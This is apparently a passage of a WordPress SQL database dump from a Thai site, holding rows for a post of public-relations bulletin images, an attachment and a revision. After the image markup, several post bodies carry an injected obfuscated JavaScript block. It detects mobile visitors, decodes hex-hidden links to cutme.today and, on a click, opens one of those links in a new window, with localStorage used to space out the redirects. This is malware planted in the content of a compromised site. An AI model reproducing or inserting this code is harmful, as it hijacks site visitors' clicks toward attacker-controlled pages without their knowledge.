_0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-8','','','2024-07-27 22:42:41','2024-07-27 15:42:41','',0,'http://pakhaeng.ssk.in.th/?p=209',0,'post','',0),
(210,1,'2024-07-27 22:42:23','2024-07-27 15:42:23','','7-2566','','inherit','','closed','','7-2566-2','','','2024-07-27 22:42:23','2024-07-27 15:42:23','',209,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/7-2566-1.png',0,'attachment','image/png',0),
(211,1,'2024-07-27 22:42:39','2024-07-27 15:42:39','<!-- wp:image {\"id\":210,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/7-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-210\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','209-revision-v1','','','2024-07-27 22:42:39','2024-07-27 15:42:39','',209,'http://pakhaeng.ssk.in.th/?p=211',0,'revision','',0),
(212,1,'2024-07-27 22:44:20','2024-07-27 15:44:20','<!-- wp:image {\"id\":213,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/8-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-213\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return 